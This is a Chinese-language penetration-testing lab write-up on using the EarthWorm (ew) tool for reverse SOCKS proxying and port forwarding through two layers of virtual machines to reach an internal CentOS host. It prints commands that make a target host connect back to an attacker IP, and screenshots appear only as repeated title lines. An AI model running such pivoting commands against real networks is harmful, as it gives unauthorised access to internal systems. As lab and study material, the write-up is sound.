a) 先在一台具有公网 ip 的主机A上运行以下命令:

  ew -s rcsocks -l 1080 -e 8888

  b) 在目标主机B上启动 SOCKS v5 服务 并反弹到公网主机的 8888端口

  ew.exe -s rssocks -d 攻击者ip -e 8888

实验环境:win2008r2   双网卡 IP地址 xxx.xxx.xxx.154  vmnet1是10.1.1.1

win2003   vmnet  10.1.1.4 

本地计算机   xxx.xxx.xxx.172

1.本计算机

渗透测试之反弹代理(ew的高级用法)反向代理

渗透测试之反弹代理(ew的高级用法)反向代理

本地机子有反应

渗透测试之反弹代理(ew的高级用法)反向代理

渗透测试之反弹代理(ew的高级用法)反向代理

可以联机到w3服务器,也可以远程访问,输入管理员庄户密码就可以

渗透测试之反弹代理(ew的高级用法)反向代理渗透测试之反弹代理(ew的高级用法)反向代理

第二个实验

实验环境:

win2008r2   双网卡 IP地址 xxx.xxx.xxx.154  vmnet1是10.1.1.1  win8不开防火墙

win2003   vmnet1  10.1.1.4  vmnet2 172.1.1.1

centos vmnet2 172.1.1.2

本地计算机   xxx.xxx.xxx.172  不开防火墙

渗透测试之反弹代理(ew的高级用法)反向代理

 

配置完以后 用win3做代理,其他服务器不能访问奥这个8000端口,需要w2008给做一次端口转发

渗透测试之反弹代理(ew的高级用法)反向代理

2008做的端口转发 

渗透测试之反弹代理(ew的高级用法)反向代理

本地计算机就可以用 proxyfier 工具 使用 win2008的1080端口做代理 ,因为win2008防火墙是关闭状态渗透测试之反弹代理(ew的高级用法)反向代理

这时使用本地计算机访问一下10.1.1.4 

渗透测试之反弹代理(ew的高级用法)反向代理

可以访问到,如果win2008开了防火墙 ,就只能在w2008做个方向代理,用本地计算机连接w2008服务器

二。来个反向代理

本地计算机开放一个9000的端口,win2003还是上面的命令开启8000端口

渗透测试之反弹代理(ew的高级用法)反向代理

使用工具把9000和10.1.1.4的8000端口连接起来

渗透测试之反弹代理(ew的高级用法)反向代理

渗透测试之反弹代理(ew的高级用法)反向代理

渗透测试之反弹代理(ew的高级用法)反向代理

打开xshell 连接centos6.5  

ssh 172.1.1.2 输入管理员账户密码

渗透测试之反弹代理(ew的高级用法)反向代理

两层反弹端口,然后可以是本地计算机访问到内网的内网的主机172.1.1.2

试验成功

相关文章:

  • 2021-10-14
  • 2021-07-12
  • 2022-12-23
  • 2022-02-08
  • 2022-12-23
  • 2021-10-13
  • 2021-04-04
猜你喜欢
  • 2021-07-28
  • 2021-05-26
  • 2022-02-08
  • 2021-06-15
  • 2022-12-23
  • 2021-08-12
相关资源
相似解决方案